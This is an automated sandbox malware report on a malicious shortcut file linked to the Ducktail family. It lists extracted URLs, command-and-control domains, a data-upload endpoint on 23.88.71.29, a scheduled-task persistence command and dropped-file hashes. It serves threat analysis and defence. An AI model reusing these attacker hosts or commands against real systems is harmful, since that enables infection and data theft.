http://www.microsoft.coB	powershell.exe, 00000009.00000002.25884234697.000001FA34426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7BA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz9	powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY	powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7df	powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595d	powershell.exe, 00000002.00000002.24493746588.000002620BEF0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a4	powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C978000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C6BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	svczHost.exe, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	false		high
https://aka.ms/dotnet-warnings/	svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://akademiiiiiiii.online	powershell.exe, 00000002.00000002.24493746588.000002620C978000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C6BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E0878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E083F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1D730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f	powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://contoso.com/	powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.24568420027.000002621B2D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24425740181.000001C3EFC34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2BF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.00000281814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.88.71.29:8000/api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4pv%	myRdpService.exe, 00000023.00000002.25567154956.000001C9E81AE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/7	powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000002.00000002.24575988850.00000262233EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA34015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24768726851.00000281EAE12000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.24493746588.000002620B261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://.jpg	svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.o	powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85	powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620B77A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.XZ	powershell.exe, 00000005.00000002.24402670816.000001C3E083F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c	powershell.exe, 00000002.00000002.24493746588.000002620B7C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.24568420027.000002621B2D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24425740181.000001C3EFC34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2BF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.00000281814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E09EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028181056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818127C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180BD4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/MartinKuschnik/WmiLight	svczHost.exe, 00000012.00000002.25195480002.0000024F7BA48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c	powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://.VisualCQ	powershell.exe, 00000002.00000002.24581342497.00000262237C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.openxmlformatCK	powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://akademiiiiiiii.online	powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.openxmlformats.SJm	powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/PesterXz9	powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlh	powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.c	powershell.exe, 00000009.00000002.25884234697.000001FA34426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000002.00000002.24575988850.00000262233EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA34015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24768726851.00000281EAE12000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/GlobalizationInvariantMode	powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b6	powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.24493746588.000002620B261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.93.157	akademiiiiiiii.online	United States		13335	CLOUDFLARENETUS	false
23.88.71.29	unknown	United States		18978	ENZUINC-US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578267
Start date and time:	2024-12-19 14:21:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ny.lnk.d.lnk
Detection:	MAL
Classification:	mal100.troj.evad.winLNK@61/53@1/2
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.111.229.43, 20.189.173.26, 142.250.105.94, 20.190.135.5
Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, onedscolprdwus19.westus.cloudapp.azure.com, login.live.com, s-0005.s-msedge.net, self.events.data.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, s-0005-office.config.skype.com, nexusrules.officeapps.live.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net
Execution Graph export aborted for target myRdpService.exe, PID 4280 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 4012 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4764 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5520 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7084 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8052 because it is empty
Execution Graph export aborted for target powershell.exe, PID 9052 because it is empty
Execution Graph export aborted for target svczHost.exe, PID 8876 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ny.lnk.d.lnk

Simulations

Behavior and APIs

Time	Type	Description
08:23:46	API Interceptor	7391121x Sleep call for process: powershell.exe modified
08:25:19	API Interceptor	173x Sleep call for process: myRdpService.exe modified
14:24:20	Task Scheduler	Run new task: zServicenonbo1 path: C:\Windows\Temp\svczHost.exe s>nonbo1 akademiiiiiiii.online 46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.88.71.29	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	23.88.71.29:8000/api/registry/upload/97a8e4b30983649f5e9b520f03fe6c12
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
akademiiiiiiii.online	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	172.67.211.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	slifdgjsidfg19.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	172.67.179.109
	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	172.67.211.185
	hnghksdjfhs19De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	jhsdgfjkh236.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjhsdgGarmin17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
ENZUINC-US	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	23.88.71.29
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	192.157.238.248
	236236236.elf	Get hash	malicious	Unknown	Browse	23.88.53.29
	armv5l.elf	Get hash	malicious	Unknown	Browse	23.88.146.236
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	hnsadjhfg18De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	slifdgjsidfg19.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	De17De16.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	fghdsdf17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	104.21.93.157
	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse	104.21.93.157
	hnghksdjfhs19De.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	jhsdgfjkh236.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157
	kjhsdgGarmin17.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	104.21.93.157

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	rs.lnk.d.lnk	Get hash	malicious	Unknown	Browse
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse

Input	Output
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Join Our Team: Facebook Ads Expert at Storytailors", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": [ "Facebook" ] }
	{ "brands": [ "Facebook" ] }

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	47845
Entropy (8bit):	5.074854209812235
Encrypted:	false
SSDEEP:	768:FrWKbV3IpNBQkj2Uh4iUxTaVLfrRJv5FPvShsHvhRardFPzUpGYWz7OdBZNmzqtB:Fr3bV3CNBQkj2Uh4iUxTaVLflJnPvDHP
MD5:	1F94C23AAB97196C7E8F87461F4A3031
SHA1:	021022C962124665A4DD193A1E2B874B2E5F8E3D
SHA-256:	36D5880B1E388AB5ABD3A0DA8E68259506E2DFF55C9D3BB87FC0C5B4C0ACB12B
SHA-512:	BB116EE21DAF5C2D5C7ABAFFAE09281F9A60104D8830899888A001DE536EBEE8B71F69381CC6B2DE74A8BB6287BEB2D6A10CFD56B3C8D9B6641116544AC7E19B
Malicious:	false
Preview:	PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

Process:	C:\Windows\System32\sppsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	796616
